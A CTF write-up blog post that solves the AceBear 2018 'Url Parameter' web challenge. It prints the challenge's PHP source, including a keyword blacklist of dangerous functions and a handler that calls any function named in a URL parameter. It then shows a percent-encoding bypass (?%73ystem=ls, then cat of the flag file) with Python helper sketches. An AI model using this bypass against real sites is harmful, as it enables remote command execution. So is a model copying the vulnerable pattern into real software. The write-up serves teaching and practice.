Codehead's Corner
Random ramblings on hacking, coding, fighting with infrastructure and general tech
AceBear CTF 2018 - Url Parameter - Web - 100
Posted: 28 Jan 2018 at 03:10 by Codehead


Description: this chall sucks, you should watch VIE vs UZB match. :)
Author: kad96
Website: Link

Visiting the website gave me a blank page. There had to be something more hidden here.


Even though the page was blank, the developer tools showed a 200 OK response coming back from the server; something was happening, we just weren't seeing any output.

A quick poke around the URL revealed a robots.txt file which gave the first clue:

# you know de wae ma queen
User-Agent: *
Disallow: /?debug

Visiting /?debug provided the PHP source code driving the page:

$blacklist = "assert|system|passthru|exec|assert|read|open|eval|`|_|file|dir|\.\.|\/\/|curl|ftp|glob";

if(count($_GET) > 0){
    if(preg_match("/$blacklist/i",$_SERVER["REQUEST_URI"])) die("No no no hackers!!");
    list($key, $val) = each($_GET);

It seems the page is checking for and blocking directory traversal sequences (../), and also preventing command injection by filtering out a bunch of useful PHP function names.
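To see what the filter actually catches, the blacklist can be replayed as a regex outside PHP. A quick local sketch in Python (the pattern is copied from the challenge source; the example URIs are my own):

```python
import re

# Blacklist pattern copied verbatim from the challenge source; PHP applies
# it case-insensitively against the raw REQUEST_URI.
BLACKLIST = r"assert|system|passthru|exec|assert|read|open|eval|`|_|file|dir|\.\.|\/\/|curl|ftp|glob"

def is_blocked(request_uri: str) -> bool:
    """Mimic preg_match("/$blacklist/i", $_SERVER["REQUEST_URI"])."""
    return re.search(BLACKLIST, request_uri, re.IGNORECASE) is not None

print(is_blocked("/?system=ls"))   # the obvious payload is caught
print(is_blocked("/?SYSTEM=ls"))   # case tricks don't help, the match is case-insensitive
print(is_blocked("/?phpinfo="))    # names outside the list get through
```

Note that the check runs on the URI as a string, not on the decoded parameters; that detail matters later.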

The last section takes the GET parameters from the URL and helpfully executes the parameter with the value as an argument. It seems like command injection is the way to go, but we need to either find commands that are not blocked, or sneak something past the blacklist filter.

A quick test showed that we were on the right track:

Function not found!!
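The "Function not found!!" message suggests the page checks something like function_exists before calling the parameter name. A minimal Python analogue of that dispatch pattern (the names here are mine, not the challenge's):

```python
import builtins

def dispatch(params: dict) -> str:
    # Take the first query parameter, like list($key, $val) = each($_GET)
    key, val = next(iter(params.items()))
    # Look the name up as a function, like PHP's function_exists()
    func = getattr(builtins, key, None)
    if func is None:
        return "Function not found!!"
    # Call the function named by the parameter, with its value as argument
    return str(func(val))

print(dispatch({"nosuchfunc": "x"}))  # Function not found!!
print(dispatch({"len": "hello"}))     # 5
```

Calling arbitrary functions by user-supplied name is the whole vulnerability; the blacklist is the only thing standing between us and system().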

Initially I played with preg_replace. The idea was to obfuscate the command to pass the checks, restore it to a usable state with a replacement, and execute the result using the /e modifier. However, underscores are filtered by the blacklist, which rules out a whole heap of useful functions.

I built a local instance of the page and tested a few things with the blacklist removed. This showed that a simple:

http://localhost/?system=ls

followed by:

http://localhost/?system=cat filename

would work just fine, as long as I could get past the blacklist.

The space in cat filename bothered me, but the browser filled in a %20 and everything worked just fine. This gave me an idea: would a URL-encoded parameter name slip past the blacklist? The letter 's' is 0x73, so let's tweak the URL a little:

http://localhost/?%73ystem=ls

flag-a-long-name-that-you-wont-know.php index.php robots.txt
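The reason this slips through can be checked offline: the filter runs on the raw REQUEST_URI, where the string "system" never appears, but PHP percent-decodes the query string before populating $_GET. A Python sketch of the two views, using the stdlib urllib to stand in for PHP's decoding:

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Blacklist pattern copied from the challenge source
BLACKLIST = r"assert|system|passthru|exec|assert|read|open|eval|`|_|file|dir|\.\.|\/\/|curl|ftp|glob"

raw_uri = "/?%73ystem=ls"

# View 1: the filter sees the raw URI, where "system" is broken up by the %73 escape
print(re.search(BLACKLIST, raw_uri, re.IGNORECASE))  # None -> the filter passes it

# View 2: the query string is percent-decoded before the parameters are used,
# so the dispatch still ends up calling system("ls")
params = dict(parse_qsl(urlsplit(raw_uri).query))
print(params)  # {'system': 'ls'}
```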

That works! Now to dump the file…
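Putting it together, the dump request just needs the encoded function name plus a %20 for the space. A small helper to build it (the hostname is a placeholder; quote() stands in for the encoding the browser did for us):

```python
from urllib.parse import quote

def build_url(host: str, cmd: str) -> str:
    # %73 hides "system" from the URI blacklist; quote() encodes the space as %20
    return "http://" + host + "/?%73ystem=" + quote(cmd)

url = build_url("challenge.example", "cat flag-a-long-name-that-you-wont-know.php")
print(url)
```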

Nothing? Did we do something wrong?

Nope; looking at the response in the developer console, we see the flag sitting in a comment:

    //here the flag: AceBear{I_did_something_stupid_with_url}


Categories: Hacking CTF
